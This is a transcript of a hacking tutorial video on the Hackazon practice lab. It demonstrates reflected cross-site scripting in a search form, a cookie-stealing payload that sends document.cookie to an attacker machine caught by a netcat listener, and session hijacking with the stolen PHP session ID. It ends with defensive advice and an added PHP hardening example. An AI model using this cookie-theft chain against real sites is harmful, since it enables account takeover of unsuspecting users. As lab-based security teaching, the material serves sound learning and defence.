How Hackers Create Fake Links To Get Your Accounts!

18.Aug.2021

Hey guys, welcome back to another episode on how to hack. So here we're on Hackazon, which is a vulnerable platform mimicking an e-commerce site. So the first thing you should do, whether it is for bug bounty, whether it is for web application penetration testing, the whole idea is to get into the site and understand how pages send data to other pages, right? So what is the route of data, so where does information get transferred from one page to another page, and what are the functions and features available that we can utilize as part of testing for vulnerabilities? So in this case, once we land onto the page for the first time, all we're going to do is look at the page and see where all the different pages are. So we can look at, on the top right corner, we have Sign In, Sign Up, we have a search, we have Special Selection, so we can go in and click onto any of the Special Selection, and of course we can see onto the URL, which is a very important piece of data. All right, so here we have `?id=16`. So you can easily change this to say 17, we can change this to 18. All right, so again we can understand that they have an incremental approach in actually managing all these different products in their database system.

So of course we can go ahead and go to Hackazon. So again, one good thing about Hackazon is that, unlike the traditional way of building applications, it's actually using AJAX as well as REST APIs for pulling out all this data as well as insertion of data, so this is a more modern way of doing web application deployment.
So we can go under Search Products here, which is one of the first places we can look at in terms of doing some kind of test. So I can go in, enter for example "nba", and I can click on Search, and of course we got a result here. All right, searching by "nba" we got a result here, and we can go ahead and click on it, right? So we can see the product, the information, and so on and so forth. So going back here, you can go under the URL. So I'm going to go onto the magnifier so it's easier for you to see. I'm going to go under the magnifier, all right, and of course on the magnifier we can look at the URL, and in this case the URL has `search?id=` and the search string. So there are a number of parameters that we can input into, so this is the place we're looking to fuzz, or to actually try to break the system, to inject our own code. So one of those areas that you can do immediately is to look under the input form. All right, so I can go ahead and enter for example `<script>` ... `</script>` and we can enter `alert`. All right, so you can enter whatever information you want to and click on Search, and immediately we got a pop-up. All right, it says "hacked by Lloyd". All right, so we got all these details here, so this means that this particular input form is actually vulnerable to a cross-site scripting attack. So you'll be asking, okay, so what can I do with it, right? Because it's all happening on your own browser. So the question is, you know, can we impact this or affect other users who are actually surfing the site?
All right, so this is part of how phishing attacks could actually work out. So what we can do next is, instead of entering our own text field, we can enter another form of text. Okay, so in this case I'm going to go ahead and enter another, different kind of payload. Okay, so I can enter for example `document.cookie`, and we can go ahead and click under Search, and in this case we got a lot more information. Okay, we got the PHP session ID, all right, and we have the visited products and all those details. All right, so of course what we can do next is to craft our own payload as part of the attack.

So I'm going to jump into Kali Linux over here. So in Kali Linux, okay, so again once I'm over here, back into the site, and of course we can sign in or sign up, and of course in this case I can enter for example my own username or my own password that registered as part of using the e-commerce site. So I can go ahead and enter the username, all right, and then I can enter the password and click Sign In. All right, so once we're in, okay, I'm not going to save any information. So we have Your Account, we have all these different details, right? So I can go to the top right corner, all right, I can click under Web Developer, I can click under Storage Inspector, and we can see that we have the cookies information here under the IP address of 192.168.0.199, so this is the Hackazon server IP address. All right, so of course we have the value over here.

Okay, if I go back into the other user who we are targeting, okay, we're targeting this particular browser to get the cookie's information as part of a phishing attack. So if I click Sign In, so I have another account here, so I can go and enter "two", all right, so I can enter the password again and I can click Sign In. All right, so I click under Your Account, I click on My Profile, and we can see here we have the username, we have the email address, we have the first name, last name, and so on and so forth.
All right, so going back to Kali Linux. All right, so I've actually created a payload for you already so it's easier for you to learn. So over here I have the Hackazon XSS cookie stealer. All right, so again if you've been following the channel, all right, we have done so many tutorials and lectures for you to learn all about cyber security, with sqlmap and so on and so forth, right? So in this case we have the Hackazon cross-site scripting cookie stealer, so double click on this. All right, so we actually have the payload right here. All right, so I have the following: so we have `<script>`, so we're creating a new image, and in this case we're going to send the data, all right, we're going to send the data to port 9999, all right, with `hacker.php?output=` and we have the `document.cookie`. All right, so we got all these details here. I'm going to copy this, I'm going to go back to Hackazon, all right, I'm going to go back to Hackazon and I'm going to go under the search again. All right, so of course what we're going to do now is just change at the URL level or a search term level. Okay, we can change the URL level or system level. Okay, so we have this script here. All right, so once you click under Search, okay, immediately it would send information, okay, into the target server over here, and of course in this case the target server, as you can see, all right, we have the IP address, so this is the IP address of the Kali Linux machine that will be hosting, all right, the collection point to collect all those data. It is going to be sent over into Kali Linux, all right, which is all the document cookie. Okay, so in this case with 192.168.0.106.

All right, so what we can do is of course go ahead and click Search, all right, so and so forth, so we get this URL here. Okay, we got this URL here, so I'm going to copy this URL. All right, I'm going to start up the netcat server for us to actually take in the inputs. Okay, `nc -lvp`, all right, followed by `9999`. All right, so this is the port number that will be taking in the information, all right, from the `document.cookie` of any user who clicked onto the link. Okay, so I'm going to click Enter now, and I'm going to go back to the target browser, the target browser which is on my host machine. So I go back here, and now I'm currently logged in as this, right? So I can right click and I can paste it and hit Enter on this. Okay, and it states the full search by whatever. Okay, so when I go back to Kali Linux, immediately here we can see the information. Okay, so we have the PHP session ID. All right, so we got the details, we got the data sent over to Kali Linux right now.
So then the next question is, what can hackers do right now that they have the PHP session ID? What the hackers can do is that they can copy the PHP session ID, copy the selection, go back, all right, into their browser, and if you go onto Your Account again, I click on My Profile. This user, okay, is the loy liang young at loyola.com. All right, and of course the target browser, okay, if I go back to My Profile, is "two". All right, so we're targeting the other user. So once you go back to Kali Linux, I can just double click on the value, all right, remove the value and paste the new PHP session ID that we have obtained, hit Enter on this. All right, go back to Your Account, click My Profile, and immediately, okay, I can do a refresh and immediately we have access to someone else's profile.

Okay, and why is this happening, right, in terms of the defense part? It's because the session cookie actually persists from the web application server setting. So it's very important to always refresh the session ID, especially when users log out, when users exit their profile, or when they have changes to different attributes. All right, so these are very important points and aspects to take note of, especially when you're building your web application systems, right? So you definitely want the sessions to refresh upon different changes in the session, right, so that hackers will not be able to take those details and data. And secondly, secondly is that you want to sanitize our inputs. So you can either sanitize it at the web application firewall level, so you have a list, you have a list of payloads that are allowed to be sent over into the application server. All right, so those will be key defense measures that you can undertake to help protect your sites from hacking.

Okay, so once again I hope you've learned something valuable in today's tutorial, and if you've any questions feel free to leave a comment below and I'll try my best to answer any of your questions. And do like, share and subscribe to our channel so that you can be kept abreast of the latest cyber security tutorials. Thank you so much once again for watching.
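The defense part described in the video (refresh the session ID on login and logout, and stop reflecting the search string raw into the page) written out in PHP, as an added example that is not the video's or Hackazon's own code; the function names and cookie settings are assumptions for a generic PHP session-based app.

```php
<?php
// Added example, not from the video or from Hackazon. Hardens the two
// weaknesses the walkthrough relies on: a session id that survives login,
// and a search string reflected unencoded into the page.
// Requires PHP 7.3+ for the array form of session_set_cookie_params().

// HttpOnly keeps document.cookie from reading PHPSESSID, Secure limits it
// to HTTPS, SameSite=Strict stops it being sent on cross-site requests.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);
session_start();

// Issue a fresh session id on every authentication change, so an id seen
// before login (or captured from another user) no longer maps to this account.
function login_user(string $userId): void
{
    session_regenerate_id(true);        // true = delete the old session data
    $_SESSION['user_id'] = $userId;
    $_SESSION['auth_at'] = time();
}

function logout_user(): void
{
    $_SESSION = [];
    session_destroy();
    // Also expire the cookie in the browser so the old id is not reused.
    setcookie(session_name(), '', time() - 3600, '/', '', true, true);
}

// Encode the search term when echoing it back, instead of writing it raw.
// htmlspecialchars turns <, >, &, " and ' into entities, so a <script> tag
// in the query is displayed as text rather than executed by the browser.
function render_search_heading(string $searchString): string
{
    $safe = htmlspecialchars($searchString, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h2>Search results for: {$safe}</h2>";
}
```

Call `login_user()` only after the password check succeeds, and call `render_search_heading()` wherever the application currently echoes `$_GET['searchString']` into the results page.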
